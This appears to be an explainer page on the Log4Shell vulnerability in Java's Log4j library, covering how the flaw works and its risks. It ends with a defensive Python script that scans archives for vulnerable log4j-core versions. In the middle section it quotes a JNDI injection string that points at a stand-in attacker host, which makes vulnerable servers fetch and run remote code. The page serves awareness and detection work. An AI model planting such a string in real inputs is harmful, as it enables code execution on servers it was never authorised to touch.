What is Log4j?
Log4j is a popular, widely used Java logging library published as open source by the Apache Software Foundation. Applications use it to record events, errors and their associated diagnostic messages. A familiar example: when you click a broken link or mistype an address and the site answers with a 404 ("no such page"), the application behind that web server normally writes a record of the failed request to its log, and in many Java applications that record is written by Log4j.
Log4Shell vulnerability (CVE-2021-44228)
Log4Shell is the name given to a vulnerability in the Log4j library. It stems from a feature that lets users customize how log messages are formatted: a message may contain "lookups" written as ${...}, which Log4j replaces with other values at logging time, for example a system property, an environment variable, or the user name associated with a server login attempt. The vulnerability has a CVSS score of 10.0 (the maximum), and it was published on 10 December 2021.
Unfortunately, this substitution can be driven by attacker-supplied input, not only by the formatting the developer intended. Among the supported lookups is a JNDI lookup: if a string such as ${jndi:ldap://attacker.example/x} ends up inside a logged message (for example in an HTTP header that the application logs), vulnerable versions of Log4j contact the named server, fetch a Java class from it and execute it. An attacker who controls that server can therefore run arbitrary code on the machine doing the logging. This opens the door to stealing sensitive information, taking control of the affected system, and pushing malware to other systems and users that connect to the compromised server.
One of the main concerns about Log4Shell is Log4j's place in the software ecosystem. Logging is a basic feature of almost all software, and Log4j is embedded in cloud services such as Apple iCloud and Amazon Web Services as well as in a wide range of software development and security tools.
Because the library is used in so many Java-based products, many of those products are expected to be vulnerable. The number of affected services is very large, which makes this a critical problem. Using the following link, you can see which servers are vulnerable to Log4Shell:
The diagram below shows how exposed infrastructure around the world is to this vulnerability.
Risks of Log4shell vulnerability
By exploiting this vulnerability, an intruder can execute arbitrary code on the vulnerable server. Because the flaw is so easy to exploit, it is expected to be adopted widely by ransomware operators, cryptominers and botnets.
Because the library can be embedded in a system in many different ways, remediation also varies, and there is no single fix that covers every deployment. Administrators and the people responsible are nonetheless strongly advised to verify whether their servers are vulnerable and, if they are, to update or patch them as quickly as possible (Apache shipped the fix for CVE-2021-44228 in log4j-core 2.15.0, so upgrading to that release or a later one is the primary remedy).
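As an added example (my own code, not from the original page and not Apache's tooling), the following Python script is one way to do the check the paragraph asks for: it walks a directory tree, opens every .jar/.war/.ear, recurses into archives nested inside them (WARs and fat jars bundle log4j-core), reads the log4j-core version from its pom.properties, checks whether the JndiLookup class is present, and classifies each finding. The version thresholds are taken from Apache's advisory for CVE-2021-44228 (fixed in 2.15.0, with 2.12.2 and 2.3.1 as the Java 7 and Java 6 backports). The archives produced by build_sample_tree are constructed fixtures containing only the entries the scanner inspects, not real Log4j jars.

```python
import io
import re
import tempfile
import zipfile
from pathlib import Path

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9). Good enough for threshold checks."""
    nums = [int(n) for n in re.findall(r"\d+", text)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))


def version_vulnerable_to_44228(version):
    """log4j-core 2.x below 2.15.0 is affected, except the Java 7 (2.12.2+) and Java 6 (2.3.1+)
    backports. Log4j 1.x is a separate code base and is not affected by this CVE.
    Early 2.0 betas are conservatively reported as vulnerable."""
    v = parse_version(version)
    if v >= (2, 15, 0):
        return False
    if (2, 12, 2) <= v < (2, 13, 0) or (2, 3, 1) <= v < (2, 4, 0):
        return False
    return v >= (2, 0, 0)


def inspect_archive(zf, origin):
    """Classify one open archive, then recurse into any archives nested inside it."""
    findings = []
    names = set(zf.namelist())
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_class = JNDI_CLASS in names
    if version is not None or has_class:
        if version is None:
            verdict = "review: JndiLookup.class present but log4j-core version unknown (shaded jar?)"
        elif not version_vulnerable_to_44228(version):
            verdict = "ok"
        elif has_class:
            verdict = "VULNERABLE"
        else:
            verdict = "mitigated: vulnerable version but JndiLookup.class has been removed"
        findings.append({"path": origin, "version": version,
                         "jndi_lookup_class": has_class, "verdict": verdict})
    for name in sorted(names):                      # WAR/EAR/fat-jar layouts nest jars
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            findings.extend(inspect_archive(inner, f"{origin}!/{name}"))
    return findings


def scan_tree(root):
    """Scan every archive under root; paths in the result are relative to root."""
    root = Path(root)
    findings = []
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(p) as zf:
                    findings.extend(inspect_archive(zf, p.relative_to(root).as_posix()))
            except zipfile.BadZipFile:
                continue
    return findings


def build_sample_tree(root):
    """Constructed fixtures, not real Log4j jars: only the entries the scanner looks at."""
    root = Path(root)
    (root / "lib").mkdir(parents=True, exist_ok=True)

    def write_zip(path, version=None, with_class=False, extra=None):
        with zipfile.ZipFile(path, "w") as zf:
            if version:
                zf.writestr(POM_PROPS, f"version={version}\n")
            if with_class:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder bytes, not a class
            for name, data in (extra or {}).items():
                zf.writestr(name, data)

    write_zip(root / "lib" / "log4j-core-2.14.1.jar", "2.14.1", True)
    # later releases still ship the class but JNDI is off by default, so the version decides
    write_zip(root / "lib" / "log4j-core-2.17.1.jar", "2.17.1", True)
    write_zip(root / "lib" / "shaded-app.jar", None, True)      # class present, no pom.properties
    stripped = io.BytesIO()                                      # 2.14.1 with the class deleted
    write_zip(stripped, "2.14.1", False)
    write_zip(root / "app.war", extra={"WEB-INF/lib/log4j-core-2.14.1.jar": stripped.getvalue()})
    return root


def demo():
    """Build the fixtures in a temp dir, scan them, return {path: verdict}."""
    root = build_sample_tree(tempfile.mkdtemp(prefix="log4shell-scan-"))
    return {f["path"]: f["verdict"] for f in scan_tree(root)}


if __name__ == "__main__":
    for path, verdict in demo().items():
        print(f"{verdict:12} {path}")
```

Deleting JndiLookup.class from log4j-core was Apache's documented workaround for deployments that could not upgrade at once, which is why a vulnerable version without that class is reported as mitigated rather than vulnerable. A shaded or re-packaged jar can carry the class without a pom.properties, so those are flagged for manual review instead of being silently passed; in a real run, point scan_tree at the application's deployment directory rather than at the constructed fixtures.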